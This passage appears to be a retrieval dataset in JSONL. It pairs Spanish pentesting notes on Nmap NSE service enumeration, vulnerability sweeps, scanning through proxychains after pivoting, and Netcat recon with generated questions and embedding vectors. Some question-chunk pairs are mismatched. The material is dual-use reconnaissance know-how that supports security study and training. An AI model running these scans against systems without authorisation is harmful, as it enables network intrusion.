0.00851, 0.02859, -0.04471, 0.10252, 0.05587, -0.0007, 0.05234, -0.06371, -0.05378, 0.08895, -0.04313, 0.0153, 0.06035, 0.07311, 0.04557, 0.02527, -0.00348, -0.01229, -0.01808, 0.02059, -0.08591, 0.04307, 0.03812, -0.08137, 0.0087, -0.03738, -0.02628, -0.0083, 0.03872, 0.00093, -0.02433, -0.02488, -0.00045, 0.02646, -0.01527, -0.02135, 0.02432, -0.07451, 0.02889, -0.0516, -0.0005, 0.03233, -0.01632, -0.00829, -0.02358, -0.03195, -0.01285, 0.02467, -0.02732, 0.00409, -0.04016, 0.03513, -0.0427, -0.00675, 0.03122, 0.03716, -0.00373, 0.06031, -0.01937, 0.00772, 0.04365, -0.02591, 0.06046, -0.02696, 0.0077, -0.0147, 0.03395, 0.07661, 0.02583, 0.00363, 0.04387, 0.01163, 0.01795, -0.04214, -0.06059, -0.04148, -0.01715, 0.05409, 0.02478, 0.03763, -0.01848, -0.01011, -0.03637, -0.0098, 0.0416, -0.02684, -0.0572, -0.04008, 0.03232, -0.01201, -0.01739, -0.00912, -0.05988, -0.04464, -0.01516, 0.01172, -0.02631, -0.01509, 0.00546, -0.02297, 0.0395, 0.00771, -0.00552, -0.01871, 0.01621, 0.01405]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por servicio (muy rentable)\n```bash\nnmap -p80,443 --script http-enum,http-title,http-headers IP # web β†’ EnumeraciΓ³n web\nnmap -p445 --script smb-os-discovery,smb-enum-shares,smb-enum-users IP # SMB\nnmap -p161 -sU --script snmp-info IP # SNMP\nnmap -p21 --script ftp-anon IP # FTP anΓ³nimo\nnmap --script vuln IP # barrido de vulns\n```", "indexar": "ΒΏQuΓ© herramienta sirve para hacer un barrido de vulnerabilidades en una direcciΓ³n IP?", "v": [-0.08464, 0.05374, -0.18482, -0.15311, 0.02295, -0.16893, 0.00926, -0.14146, -0.02996, -0.12661, 0.08214, -0.10703, -0.02537, -0.1077, -0.06247, 0.08557, 0.06425, -0.08448, 0.05853, -0.1051, -0.03623, 0.10651, -0.06142, 0.06756, -0.11143, -0.01918, -0.04866, -0.02359, -0.22384, 0.02805, -0.12534, -0.05891, 0.02965, -0.01472, -0.17005, -0.07455, 0.00934, 0.11378, -0.00348, 0.05913, 0.00097, -0.04167, -0.04119, 0.00437, 0.04979, 0.03724, 0.01928, -0.11098, 0.07305, 0.07979, -0.11049, -0.17443, -0.08877, 0.01339, -0.05097, -0.03211, 0.14709, -0.10868, 0.00234, -0.09335, -0.11472, -0.01346, -0.016, -0.00426, 0.01628, -0.15195, -0.08509, 0.0098, -0.0642, 0.05055, -0.0154, -0.06511, -0.05401, 0.06749, -0.02053, 0.0292, -0.01077, -0.01588, -0.00612, -0.00742, 0.06642, 0.09351, -0.04786, 0.00157, -0.13066, -0.10326, 0.10062, -0.09929, 0.02965, -0.09197, 0.05754, 0.14602, -0.04435, 0.00695, -0.02177, -0.00567, 0.07901, 0.04627, -0.03414, -0.04613, 0.05713, -0.05848, -0.13025, 0.06047, 0.14388, 0.10749, -0.04734, -0.00338, -0.01052, -0.04174, -0.02244, 0.00795, -0.06473, -0.03322, -0.05514, 0.07956, -0.01936, -0.04395, 0.00779, -0.02785, -0.00864, -0.0557, -0.0723, -0.03053, -0.038, 0.033, -0.00872, 0.09455, -0.02064, -0.0411, 0.00318, -0.07526, -0.08658, 0.01257, 0.01208, -0.01143, 0.07891, -0.10171, -0.06152, 0.00295, 0.10378, -0.02346, 0.00777, -0.06241, -0.01426, -0.02665, 0.03505, -0.07077, -0.05474, 0.03412, 0.01956, -0.00259, -0.02298, 0.0155, -0.06428, 0.01382, -0.00653, -0.08253, -0.07397, 0.07962, -0.01458, -0.01702, 0.05318, 0.03257, 0.01319, -0.02029, 0.02491, 0.03495, 0.11437, 0.03187, -0.018, 0.05183, 0.0443, 0.0008, -0.03269, -0.11827, -0.00469, -0.02191, -0.00595, -0.02871, -0.03624, -0.02764, -0.03075, 0.03307, 0.05099, -0.00081, 0.0788, -0.04987, 0.03608, 0.02848, -0.00183, -0.02558, 0.00517, -0.03914, 0.02112, -0.0415, -0.02857, -0.06033, -0.03089, 0.0014, -0.03439, -0.02126, -0.03776, 0.00939, 0.0721, 0.06854, -0.01662, -0.01749, -0.00764, 0.06521, 0.00503, 0.01713, 0.06376, -0.05023, -0.08657, -0.02881, 0.00911, 0.06508, -0.01219, -0.03923, -0.01075, -0.01765, 0.00659, 0.02713, 0.0475, 0.00962, 4e-05, -0.04581, 0.00334, 0.03165, -0.00191, 0.01286, -0.02963, -0.03136, 0.06699, -0.0486, 0.01954, -0.02124, -0.00918, -0.05445, 0.00497, -0.00908, 0.0156, -0.02383, -0.02665, -0.05255, -0.01544, 0.02668, -0.03147, -0.0854, -0.03149, 0.01793, 0.04657, -0.00337, -0.01252, -0.02275]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por servicio (muy rentable)\n```bash\nnmap -p80,443 --script http-enum,http-title,http-headers IP # web β†’ EnumeraciΓ³n web\nnmap -p445 --script smb-os-discovery,smb-enum-shares,smb-enum-users IP # SMB\nnmap -p161 -sU --script snmp-info IP # SNMP\nnmap -p21 --script ftp-anon IP # FTP anΓ³nimo\nnmap --script vuln IP # barrido de vulns\n```", "indexar": "Con quΓ© puedo realizar enumeraciΓ³n web y descubrimiento de servicios como SMB o SNMP?", "v": [0.01007, -0.03962, -0.15694, -0.04742, -0.05131, -0.13321, -0.20624, -0.13962, -0.20992, -0.01684, -0.19594, 0.05234, 0.14083, -0.17365, -0.05169, 0.22629, 0.02626, -0.17984, 0.02819, 0.07179, 0.02073, -0.0597, 0.00655, -0.04257, -0.001, -0.02602, -0.00068, 0.05092, 0.0391, 0.0544, -0.01087, 0.04483, -0.06303, 0.04685, -0.06202, 0.06157, 0.0278, 0.04534, 0.02616, -0.05627, -0.01243, -0.188, -0.01918, 0.03437, -0.08582, -0.02074, -0.01187, -0.04707, -0.07558, -0.0233, -0.04501, 0.09387, -0.20248, -0.07084, -0.12233, 0.01059, 0.05258, -0.00744, 0.0311, 0.01431, -0.02864, -0.0153, -0.01039, -0.04937, 0.08216, -0.14588, -0.05635, 0.0508, 0.03654, 0.02121, -0.02817, -0.03464, 0.11119, -0.01418, 0.00229, 0.04118, -0.05819, 0.0207, 0.12348, 0.02275, 0.01826, 0.02687, -0.08696, -0.01312, -0.0114, -0.03741, 0.01592, -0.05977, -0.01362, -0.0936, 0.04679, 0.13338, -0.04313, 0.14463, -0.06539, -0.06726, 0.0434, -0.04778, 0.05662, 0.00518, 0.06893, 0.05877, -0.11132, 0.09335, -0.00024, 0.09204, 0.13555, 0.03631, -0.03044, -0.12242, 0.01328, -0.04167, -0.06667, -0.04929, -0.07704, -0.01684, -0.01937, -0.01968, -0.01636, -0.08229, -0.02619, -0.02341, -0.01051, 0.012, -0.06644, -0.03547, 0.02428, 0.0404, 0.06058, -0.08203, 0.03116, -0.03278, -0.04003, -0.02371, 0.04972, -0.03164, -0.01308, -0.00846, 0.06121, 0.00021, 0.07552, -0.08765, -0.05884, -0.05518, 0.01811, -0.04869, 0.03031, -0.01813, -0.06655, -0.04179, 0.00318, 0.00598, -0.07163, 0.04366, 0.03018, 0.01988, 0.01168, -0.014, -0.04989, 0.04416, -0.0741, 0.02692, 0.03708, 0.00829, 0.01519, 0.02131, -0.03128, -0.00312, -0.01641, -0.02587, -0.03745, 0.04375, -0.00037, -0.14966, 0.05316, -0.02588, -0.02562, 0.0069, 0.09639, -0.01386, -0.01391, 0.0029, 0.00133, 0.01687, -0.09154, -0.03495, 0.03136, -0.1208, -0.03947, -0.0211, 0.01517, 0.00419, 0.00165, 0.07902, -0.03794, -0.05883, 0.01019, 0.01268, -0.02106, -0.04115, -0.03091, -0.00209, -0.1138, -0.03164, -0.02953, -0.02145, -0.03653, 0.04015, 0.01533, 0.01212, 0.03769, -0.04671, 0.11381, -0.05705, -0.01698, -0.06352, 0.01558, 0.05118, -0.00774, 0.03634, 0.05876, -0.01568, 0.02385, -0.0059, -0.01827, -0.06442, 0.00325, 0.04211, 0.04406, 0.00304, -0.00069, -0.00344, 0.01029, -0.0519, 0.04541, 0.02518, -0.03793, -0.03227, -0.01113, 0.02314, -0.0241, -0.00612, -0.01959, 0.00192, 0.03555, -0.02385, -0.00198, -0.00439, -0.0096, -0.02757, 0.02195, -0.00387, 0.04178, -0.02678, 0.00316, 0.01733]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por servicio (muy rentable)\n```bash\nnmap -p80,443 --script http-enum,http-title,http-headers IP # web β†’ EnumeraciΓ³n web\nnmap -p445 --script smb-os-discovery,smb-enum-shares,smb-enum-users IP # SMB\nnmap -p161 -sU --script snmp-info IP # SNMP\nnmap -p21 --script ftp-anon IP # FTP anΓ³nimo\nnmap --script vuln IP # barrido de vulns\n```", "indexar": "ΒΏCuΓ‘l es la alternativa libre a nmap para el escaneo de puertos y scripts?", "v": [-0.04413, -0.11083, -0.0362, -0.07811, -0.00817, -0.11123, -0.03292, -0.20805, -0.13554, -0.00705, -0.07039, 0.00241, 0.06195, -0.07537, -0.08936, -0.02886, -0.06873, -0.0297, 0.14083, 0.16185, -0.09944, -0.00847, -0.0791, -0.01913, 0.00027, -0.01958, -0.02967, 0.15006, -0.13537, 0.02611, -0.06019, 0.07363, 0.08849, -0.05387, 0.05875, -0.00189, 0.21597, -0.08275, 0.15461, 0.08616, 0.02168, 0.01815, -0.04269, -0.04015, 0.03611, -0.1355, -0.08921, 0.02837, 0.01442, -0.0104, -0.04144, 0.00772, -0.10374, 0.07076, 0.00346, 0.03086, 0.07023, -0.10087, -0.01609, -0.05381, -0.10956, 0.07116, 0.00797, -0.10944, -0.0371, -0.06294, -0.02272, -0.06793, -0.1127, 0.03826, -0.03037, -0.0482, -0.00595, 0.06656, -0.05507, 0.00343, -0.09825, -0.06906, 0.00565, 0.05937, 0.03888, -0.08495, -0.04186, -0.04564, -0.05324, -0.10998, -0.07962, -0.0631, -0.04007, -0.01446, 0.11279, -0.00717, 0.02757, 0.16272, 0.0049, -0.10122, -0.03222, 0.05812, 0.05101, 0.09314, 0.00529, 0.02299, -0.07366, 0.09993, -0.01144, 0.03847, 0.05644, 0.00973, 0.01023, 0.09776, 0.07001, 0.15146, -0.01567, -0.00156, 0.00208, -0.0237, 0.0143, -0.04219, 0.00911, 0.01176, -0.0227, -0.05905, -0.08076, -0.03078, -0.00506, 0.0335, 0.04239, 0.04176, -0.00716, 0.09969, -0.03071, -0.06279, -0.12341, -0.09439, -0.12648, -0.01093, 0.135, -0.06369, -0.02381, 0.02544, -0.06976, 0.04362, -0.00531, 0.02312, 0.01987, -0.03536, -0.01976, -0.04576, -0.04049, -0.04979, 0.00262, 0.01763, -0.08845, 0.06621, -0.06186, -0.02426, 0.06044, -0.00796, -0.07383, 0.11319, 0.0435, -0.05713, -0.03098, 0.03903, 0.02844, -0.03986, -0.04086, 0.01047, -0.08257, 0.02315, -0.00027, 0.12442, 0.01139, -0.1146, 0.05193, -0.0206, 0.00278, -0.10248, -0.08057, -0.03438, -0.00331, 0.06035, -0.06013, 0.01539, -0.03925, -0.09067, -0.0138, -0.0543, 0.00492, 0.10043, 0.01766, 0.00939, -0.05098, -0.06964, -0.07744, 0.02002, -0.02391, -0.07192, -0.01063, -0.00175, -0.03957, 0.07075, 0.05026, -0.03076, 0.0247, 0.02569, -0.09622, 0.01943, 0.00527, 0.03448, 0.00677, 0.01757, 0.04563, -0.0015, -0.01569, -0.00267, 0.0062, 0.07577, 0.01903, -0.01079, 0.00507, 0.06364, -0.00984, -0.03613, -0.03497, 0.00783, 0.08212, 0.04618, 0.00848, 0.07161, 0.04032, -0.01209, -0.04926, -0.01054, 0.01006, 0.00545, -0.02446, 0.03435, 0.01767, -0.01398, 0.04085, 0.03392, -0.02249, -0.04127, -0.00183, -0.04846, -0.04788, -0.00185, -0.01376, 0.03965, -0.04105, 0.00873, -0.00999, 0.00171, 0.0208, 0.00563]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Gestionar scripts\n```bash\nnmap --script-help http-enum # quΓ© hace un script\nls /usr/share/nmap/scripts | grep smb # listar los disponibles\n```", "indexar": "quΓ© programa puedo usar para ejecutar scripts de escaneo en redes?", "v": [-0.08699, -0.04104, -0.18723, -0.13757, 0.09086, -0.11967, -0.12449, -0.11916, -0.00967, -0.09248, -0.15889, -0.03436, -0.06223, -0.18747, -0.00143, 0.03731, 0.03205, -0.01341, 0.15086, 0.01642, -0.02522, -0.03625, -0.04604, 0.00245, -0.08405, 0.07424, -0.00622, 0.08521, -0.12359, -0.02671, -0.09917, 0.08872, 0.09783, -0.11089, -0.03175, 0.03992, 0.07864, 0.00946, 0.06163, 0.15175, 0.0174, 0.0628, -0.13766, -0.06414, 0.06194, -0.0121, 0.04854, -0.08652, -0.06439, -0.07499, 0.03256, -0.02367, -0.14559, 0.00381, -0.00123, -0.05565, 0.06675, -0.19585, -0.08399, 0.03478, -0.01675, -0.03753, 0.06432, -0.01101, 0.01886, -0.02684, 0.05702, -0.00735, -0.07441, 0.09757, -0.02016, 0.10144, 0.00495, 0.0373, 0.05104, 0.04818, -0.09646, -0.09084, 0.04085, 0.01543, -0.09212, -0.03036, -0.03392, 0.01552, -0.11931, -0.06264, -0.03948, -0.07783, -0.06715, -0.04947, 0.04747, -0.00447, -0.00725, 0.01929, 0.09492, -0.02996, 0.09004, -0.04368, 0.06568, 0.0414, -0.01079, -0.08181, -0.06691, 0.1559, -0.01556, 0.0884, 0.02884, 0.01193, -0.01376, -0.00521, 0.00318, 0.05287, -0.07778, -0.02056, -0.0623, 0.0286, -0.01042, -0.03659, 0.07241, -0.04359, -0.07698, 0.05739, -0.0829, -0.02177, 0.11161, -0.00956, -0.03438, 0.07605, -0.02899, 0.04335, -0.09304, -0.01423, -0.07308, -0.1206, -0.10072, -0.00837, 0.05563, -0.06353, -0.03706, -0.1076, -0.00013, 0.00062, -0.03246, 0.02748, 0.03356, 0.04036, 0.00142, -0.12737, -0.03665, 0.01212, 0.09977, 0.00541, -0.09447, 0.03114, -0.05936, -0.08087, 0.00682, 0.00208, -0.04609, 0.04007, -0.02422, -0.05362, -0.0622, 0.01187, 0.06664, -0.04777, -0.07043, 0.04212, -0.00925, 0.11005, 0.01312, 0.15538, 0.03284, -0.08954, 0.03372, -0.02684, -0.03215, -0.04492, -0.04823, -0.00966, -0.06299, 0.01616, 0.06423, 0.0179, 0.01295, -0.03147, -0.02021, 0.03675, -0.03873, 0.0582, -0.02962, 0.04913, 0.02251, -0.01728, 0.01927, -0.01501, 0.00328, -0.00323, 0.02944, -0.04344, -0.07391, 0.0481, 0.01371, -0.03422, 0.05865, 0.04034, -0.06242, -0.03721, -0.00018, 0.0946, 0.00697, -0.03413, 0.03189, 0.01331, -0.02557, -0.0273, 0.03059, 0.06402, 0.05086, 0.01599, 0.00455, -0.01316, 0.03385, -0.01163, -0.01888, -0.03302, 0.00675, -0.05018, -0.01691, 0.01449, 0.01563, -0.08524, -0.05194, -0.02624, -0.00805, -0.06005, -0.02054, -0.01222, -0.01943, -0.04388, -0.06285, 0.07594, -0.02499, -0.0195, -0.02095, -0.01218, -0.08317, -0.01431, -0.00123, -0.0042, -0.0141, 0.02798, 0.05437, -0.03413, 0.02389, 0.02964]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Gestionar scripts\n```bash\nnmap --script-help http-enum # quΓ© hace un script\nls /usr/share/nmap/scripts | grep smb # listar los disponibles\n```", "indexar": "con quΓ© herramienta puedo probar scripts personalizados para enumerar servicios web?", "v": [0.04485, 0.07667, -0.18887, -0.2542, 0.02359, -0.14626, -0.04866, -0.05506, -0.0502, -0.14692, -0.09145, 0.02243, 0.06024, -0.2038, -0.00256, 0.07516, 0.0728, -0.17394, 0.07959, 0.06392, 0.05629, -0.01039, -0.18708, -0.04841, -0.12389, -0.08887, 0.07006, -0.0087, -0.15081, 0.0909, -0.0507, 0.02009, 0.05163, -0.05994, -0.15003, 0.03132, 0.0301, 0.05352, 0.08241, 0.10895, 0.03927, -0.01387, -0.00621, 0.07677, 0.00365, 0.0287, 0.02017, -0.02845, -0.01244, -0.0308, -0.00679, -0.18488, -0.15535, -0.03291, -0.03751, -0.06708, 0.1414, -0.20482, -0.00878, -0.02306, -0.03469, -0.0542, -0.01257, 0.03149, 0.06224, -0.00149, 0.00017, -0.09289, -0.06539, 0.07728, -0.01711, 0.00786, 0.00819, -0.01727, 0.04979, -0.01296, -0.04937, -0.00828, 0.04419, 0.01536, -0.03057, -0.01949, -0.04416, 0.01372, -0.05261, -0.10423, -0.09495, 0.00501, 0.0176, -0.0943, 0.14124, 0.06771, -0.02906, -0.00307, -0.04255, -0.01634, 0.14889, -0.07631, 0.02641, -0.0505, 0.06404, -0.04156, -0.13015, 0.12774, -0.03456, 0.03886, 0.01647, 0.03934, -0.07246, -0.04292, 0.03935, 0.01205, -0.0518, 0.05081, 0.00381, 0.03013, -0.065, -0.02579, 0.01065, -0.06177, 0.04148, 0.06339, -0.12664, -0.01332, 0.02344, -0.00984, -0.01196, 0.02908, -0.06183, -0.06077, -0.02379, -0.04258, -0.10591, -0.02905, -0.00687, 0.08068, 0.07733, -0.0575, 0.01042, -0.02527, 0.02423, -0.02632, -0.01836, 0.02874, 0.04118, -0.05693, -0.03151, -0.01215, -0.05271, 0.00755, 0.0134, -0.02979, -0.01968, 0.04885, -0.0824, -0.10445, -0.01966, 0.00976, -0.09218, 0.04286, -0.04361, -0.03749, 0.02143, 0.06606, 0.06017, 0.017, 0.0097, 0.0476, 0.0364, 0.07943, 0.00256, 0.06717, 0.08091, -0.08683, 0.03584, -0.00255, -0.06122, -0.01244, -0.05808, -0.07306, 0.0056, -0.03281, 0.01097, -0.00771, -0.00767, -0.06039, 0.01516, -0.02429, 0.00607, 0.01742, -0.05281, 0.02492, -0.01237, -0.05467, 0.0586, 0.05254, -0.01683, -0.05132, -0.04669, -0.02812, -0.03988, 0.00635, 0.01161, -0.02404, -0.00336, 0.04096, -0.00859, -0.00518, 0.00377, -0.01187, 0.00365, 0.02656, 0.03358, -0.02621, -0.00346, -0.01353, 0.01867, 0.03349, -0.02075, -0.01141, 0.02389, -0.06329, -0.00916, -0.00475, -0.00723, 0.0292, 0.04617, -0.00699, -0.02313, 0.01514, 0.05866, -0.06658, -0.05453, -0.00942, 0.00494, -0.08536, 0.01788, -0.02358, -0.07212, -0.0071, -0.0379, 0.06873, -0.01454, -0.0102, -0.02047, -0.05895, 0.00234, -0.06043, -0.03343, -0.01062, -0.01613, 0.00153, 0.01087, -0.02036, 0.00541, 0.01496]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## A travΓ©s de un tΓΊnel\n`proxychains nmap ...` (de tu history) para escanear la red interna tras Pivoting ligolo-ng (usa `-sT -Pn`, SYN no pasa por proxychains).\n\nRelacionado: searchsploit Β· Puertos olvidados Β· OSCP MOC", "indexar": "que programa puedo usar para escanear la red interna sin que los puertos abiertos se muestren en el escaneo", "v": [-0.04353, -0.10792, -0.19183, -0.02564, 0.0839, -0.06674, 0.00856, -0.18646, -0.12359, -0.07357, -0.23162, 0.05529, 0.01971, -0.14545, 0.01728, 0.02194, -0.00625, 0.07417, 0.11329, 0.08301, -0.10881, -0.03825, -0.00568, 0.0274, 0.03798, 0.14659, -0.0559, 0.04614, -0.01818, 0.02256, -0.05553, 0.14511, 0.1398, -0.04422, 0.02896, -0.09597, 0.11617, -0.04817, 0.10873, 0.08569, 0.01507, 0.03615, -0.12285, -0.1133, 0.09521, -0.06401, -0.0095, 0.03132, -0.0396, 0.05531, -0.05293, -0.05545, -0.07422, -0.03391, 0.03688, -0.08272, 0.01881, 0.00592, -0.02499, -0.04532, -0.05398, 0.1105, 0.06975, -0.00215, -0.01655, -0.05538, 0.04153, 0.14092, -0.07505, 0.04398, -0.0842, 0.07242, 0.00391, 0.06135, -0.01152, -0.04306, -0.08198, -0.01182, 0.04914, 0.05062, 0.00851, 0.04398, -0.00417, -0.0105, -0.04632, -0.04261, 0.04632, -0.06052, 0.00085, -0.06622, 0.03025, -0.03362, 0.02405, 0.11162, 0.07026, -0.03748, 0.0513, 0.06446, -0.01373, 0.01956, 0.03457, -0.00489, -0.11109, 0.04624, -0.00603, 0.07344, 0.06737, -0.0801, 0.03984, 0.09228, 0.04977, 0.01417, -0.05702, -0.05357, -0.0661, -0.00187, 0.00466, -0.07893, -0.00733, -0.04153, -0.02167, -0.10189, -0.0867, -0.00697, 0.04595, -0.06401, -0.01274, 0.05548, 0.01629, 0.08125, -0.03442, -0.01019, -0.04426, -0.07673, -0.0978, -0.13138, -0.0267, -0.11122, 0.05192, -0.03147, -0.06522, 0.04965, -0.05629, -0.01954, -0.02677, 0.08136, -0.0042, -0.08048, -0.04904, -0.00777, 0.01861, -0.00309, -0.0767, 0.05744, -0.09586, 0.04997, 0.11725, -0.01615, -0.02321, 0.08156, -0.06837, -0.02984, -0.06483, -0.00872, 0.0564, -0.08172, -0.03735, -0.01674, -0.01241, 0.0202, 0.01545, 0.15272, -0.06229, -0.06885, 0.00558, -0.02745, -0.02788, -0.11331, -0.01623, -0.04113, -0.04232, 0.09028, -0.00328, -0.05898, -0.04845, -0.0679, -0.05036, -0.04713, -0.05901, 0.04266, 0.00022, 0.03432, 0.03749, -0.00755, -0.04528, 0.02965, 0.02696, 0.01759, 0.02642, -0.04826, -0.0536, 0.04748, -0.00536, -0.06767, 0.06771, 0.05074, -0.06626, 0.04967, 0.04984, 0.15092, -0.00577, -0.05818, 0.04545, 0.01048, -0.00555, 0.00141, 0.00342, 0.06438, 0.03563, 0.0284, 0.0227, 0.03605, 0.0228, 0.02714, -0.01313, -0.01224, 0.02848, -0.01422, 0.0428, 0.04952, 0.00605, -0.0485, -0.06813, -0.02819, -0.01557, -0.0024, 0.01312, 0.0117, -0.0034, -0.05308, -0.0177, 0.07195, -0.03022, -0.01752, 0.0459, -0.02376, -0.06362, 0.04147, 0.02392, -0.01017, -0.01982, 0.07748, 0.00938, -0.08719, 0.05131, 0.02382]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## A travΓ©s de un tΓΊnel\n`proxychains nmap ...` (de tu history) para escanear la red interna tras Pivoting ligolo-ng (usa `-sT -Pn`, SYN no pasa por proxychains).\n\nRelacionado: searchsploit Β· Puertos olvidados Β· OSCP MOC", "indexar": "con quΓ© herramienta puedo realizar un pivoteo de red y controlar quΓ© pasa por ella al hacer peticiones", "v": [-0.02023, 0.15068, -0.20954, -0.05574, 0.12874, -0.08935, 0.01267, -0.01199, -0.02479, -0.1527, -0.0242, -0.00569, 0.09287, -0.09493, 0.14155, -0.03957, 0.03163, 0.03021, 0.07901, -0.01876, -0.09952, -0.01227, -0.05637, -0.00955, -0.029, 0.12274, 0.13015, 0.05723, -0.10126, 0.08857, -0.04191, 0.04876, 0.04363, -0.04895, -0.03724, 0.0724, 0.03781, 0.06737, 0.11103, 0.05667, -0.12946, 0.07396, -0.027, 0.01032, 0.10914, -0.04119, -0.07772, -0.00227, -0.06648, 0.05334, -0.06194, -0.08863, -0.13921, -0.03235, 0.02791, -0.10878, 0.20421, -0.16163, 0.0266, -0.17992, -0.07507, -0.0375, 0.0572, 0.07472, -0.04916, -0.02948, -0.00701, -0.07521, -0.0333, 0.13067, 0.00162, -0.08184, 0.0105, 0.02909, 0.07263, -0.02711, -0.04216, 0.02831, 0.01261, 0.02896, -0.02818, 0.07161, -0.12111, 0.00759, -0.01025, -0.08811, -0.0445, -0.05185, -0.02753, -0.07641, 0.03675, 0.00469, 0.07462, -0.01953, 0.03782, -0.0061, -0.07497, 0.00728, -0.06926, -0.0718, 0.10361, -0.05341, -0.12804, 0.08664, 0.01371, 0.03921, 0.01834, -0.01859, 2e-05, 0.04162, 0.00882, 0.03627, 0.05161, -0.03163, 0.09251, 0.06124, -0.13289, -0.01425, -0.03399, -0.05616, 0.06281, 0.01597, -0.00297, -0.07717, 0.05895, -0.04641, -0.00054, 0.0946, 0.02638, -0.07844, -0.03495, -0.02507, -0.06182, -0.1299, -0.04039, -0.08082, 0.04976, -0.03831, 0.04192, -0.04413, -0.05348, 0.05906, -0.03664, -0.09865, 0.02394, -0.04387, -0.00305, -0.04536, -0.03742, 0.02617, 0.03361, -0.0215, 0.00334, 0.0059, 0.00551, 0.02942, 0.05181, 0.00857, -0.05638, 0.08441, -0.01455, -0.00573, -0.02164, -0.00306, 0.05237, -0.07148, -0.03549, 0.01064, 0.06022, -0.02576, -0.04095, 0.05571, -0.03888, -0.05765, -0.00353, -0.15082, -0.01914, -0.06395, -0.00286, -0.09495, -0.01331, 0.01785, -0.01306, 0.00938, 0.04264, -0.04437, 0.03497, 0.00559, 0.09903, 0.06695, 0.01341, 0.07056, 0.02079, -0.09605, 0.07101, 0.037, 0.00572, 0.01396, 0.04963, -0.02503, 0.01424, -0.0211, 0.02214, -0.06352, 0.01146, 0.01242, -0.05075, 0.05408, 0.04588, 0.03929, 0.09853, 0.03381, 0.03442, 0.00256, -0.00802, -0.01382, -0.00101, 0.04143, -0.02966, -0.05076, 0.12254, -0.00241, 0.06661, 0.01156, -0.03624, 0.02859, 0.05224, 0.02792, 0.00499, 0.08779, 0.03843, -0.06334, -0.03042, 0.00258, 0.01574, -0.00931, 0.06537, -0.03751, -0.04409, -0.03564, 0.03925, 0.06148, -0.00418, -0.02374, 0.0226, -0.00801, -0.07607, 0.00946, -0.00987, -0.0733, -0.02093, 0.06408, 0.06688, -0.06707, 0.01933, -0.02391]} +{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Netcat (recon)\n\n> Solo para protocolos de **texto**: SMTP, HTTP, POP3... Para shells ver Reverse shell y Egress filtering.", "indexar": "que herramienta sirve para probar puertos de texto como smtp o http", "v": [0.13442, -0.02808, -0.20496, -0.17441, 0.04657, -0.14605, 0.0416, -0.14599, -0.00206, -0.03897, -0.10643, 0.1276, 0.20165, -0.07703, -0.06944, 0.00013, 0.12622, -0.06601, 0.05711, -0.01261, 0.06061, -0.04473, -0.14581, -0.11726, -0.01505, -0.00661, 0.05132, -0.05242, -0.13475, 0.06361, -0.02976, -0.05081, 0.0632, -0.10573, -0.08062, -0.08459, 0.06585, 0.03058, 0.07478, 0.14504, 0.08199, 0.0072, -0.01317, 0.04182, -0.03582, -0.02893, -0.06958, -0.02536, -0.00635, 0.04029, -0.04736, -0.07194, -0.13364, 0.0284, -0.14058, 0.02348, 0.15936, -0.08414, 0.03774, -0.10041, -0.05411, 0.0351, -0.08062, -0.10307, -0.09122, -0.04747, -0.03107, -0.00499, -0.16334, 0.07483, -0.05634, 0.04516, 0.05031, 0.07068, -0.04733, -0.07078, -0.03568, 0.09006, 0.08088, 0.04252, 0.05083, -0.03161, -0.11206, -0.0435, -0.0314, -0.12236, -0.00795, -0.01012, 0.08081, -0.10939, 0.00935, 0.01986, 0.00842, 0.08637, -0.01434, -0.04743, 0.02635, -0.11446, 0.06797, 0.0448, 0.14238, -0.06264, -0.07162, 0.04102, -0.0421, 0.00318, -0.03654, -0.04093, 0.02232, -0.00741, 0.08276, -0.00104, -0.02554, 0.04508, -0.0198, -0.02547, -0.03804, -0.10733, -0.04266, -0.03667, -0.0021, -0.02962, -0.09901, -0.02283, -0.0139, 0.02956, 0.03797, 0.06611, 0.02747, 0.02574, 0.03335, -0.04543, -0.10976, -0.05128, -0.02316, -0.07549, 0.03012, -0.06915, -0.03522, -0.01541, -0.06569, 0.1083, -0.06794, -0.08204, -0.01125, 0.06142, 0.00139, -0.02998, -0.05239, -0.02183, 0.01128, -0.03662, -0.03329, -0.00461, -0.08076, -0.00897, 0.05586, -0.01773, -0.10552, 0.07111, -0.05349, -0.02772, -0.02424, 0.04017, 0.07787, -0.03226, -0.02844, 0.00548, 0.05939, 0.01873, 0.036, 0.06884, 0.0045, -0.0534, 0.01838, -0.02545, -0.02531, 0.00041, -0.05498, -0.04458, -0.04478, 0.03512, -0.04798, -0.0368, 0.0002, -0.05234, 0.02754, -0.08555, 0.01817, 0.05481, 0.00682, -0.00623, -0.02459, -0.02925, 0.00288, 0.02096, -0.03428, -0.04952, 0.04093, -0.034, -0.05066, -0.05794, 0.01955, -0.04971, 0.05429, 0.05316, -0.07052, 0.00514, -0.01494, 0.07916, 0.03975, 0.03044, 0.05121, -0.00929, -0.01331, -0.01375, 0.00083, 0.04096, 0.03105, 0.09029, -0.02042, 0.0099, -0.00549, 0.00821, -0.03731, 0.07421, 0.02524, 0.05932, 0.01569, 0.01981, 0.04091, -0.02862, -0.06788, 